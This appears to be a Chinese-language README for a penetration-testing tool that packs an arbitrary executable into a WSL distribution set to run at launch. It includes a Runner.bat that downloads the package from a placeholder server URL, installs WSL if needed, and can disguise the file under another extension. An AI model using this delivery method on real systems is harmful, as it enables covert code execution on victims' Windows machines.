本工具旨在用于合法的安全研究和渗透测试。用户有责任确保在测试非自己拥有或未获得明确许可的系统前,已获得适当授权。
一个用于创建带有嵌入式载荷的极简 WSL(适用于 Linux 的 Windows 子系统)发行版的 shell 脚本。此工具可自动化构建基于 Alpine Linux 的 WSL 发行版的过程,这些发行版可在启动时执行自定义载荷。
Build_WSL_Payload.sh 脚本会下载最新的 Alpine Linux rootfs,针对 WSL 使用进行自定义,嵌入用户指定的可执行文件,并将所有内容打包为可分发的 .wsl 文件。
Runner.bat 将从提供的 URL 下载 WSL 配置文件并启动它 (如果未安装 wsl 且具有管理员权限,将安装 wsl)
这对于渗透测试、安全研究和自定义 WSL 环境创建尤其有用。
-N, --name:指定 WSL 的默认发行版名称-P, --payload:指定载荷可执行文件的路径-H, --help:显示帮助菜单# Build a WSL distribution named "CalcWSL" with a custom payload
./Build_WSL_Payload.sh -N CalcWSL -P ./Calc.exe
选项 1. 双击 - 双击 WSL 文件将执行载荷,但也会打开一个需要手动关闭的 cmd 提示符。(不推荐)
选项 2. 使用 Runner.bat 文件
C:\Users\USER_NAME> .\Runner.bat
Runner.bat 脚本会自动:
编辑 Runner.bat 顶部的变量以自定义:
set "DOWNLOAD_URL=https://your-server.com/payload.wsl"
set "WSL_FILE=payload.log" # Still testing but can use most file extensions here.
本项目受 dmcxblue/WSL-Payloads 存储库中记录的研究和技术启发,并在此基础上构建,该存储库为 WSL 文件格式武器化和安全研究提供了宝贵的见解。
MIT 许可证
特此免费授予任何获得副本的人 本软件及相关文档文件(“软件”)的权利,以处理 本软件而无任何限制,包括但不限于以下权利: 使用、复制、修改、合并、发布、分发、再许可和/或出售 软件副本,并允许向其提供软件的人员 在以下条件下这样做:
上述版权声明和本许可声明应包含在 软件的所有副本或实质性部分中。
本软件按“原样”提供,不附带任何明示或暗示的担保, 包括但不限于适销性、 特定用途适用性和不侵权的保证。在任何情况下, 作者或版权持有人均不对任何索赔、损害赔偿或其他责任负责, 无论是合同诉讼、侵权或其他诉讼,由 本软件或本软件的使用或其他交易引起或与之相关, 均不承担任何责任。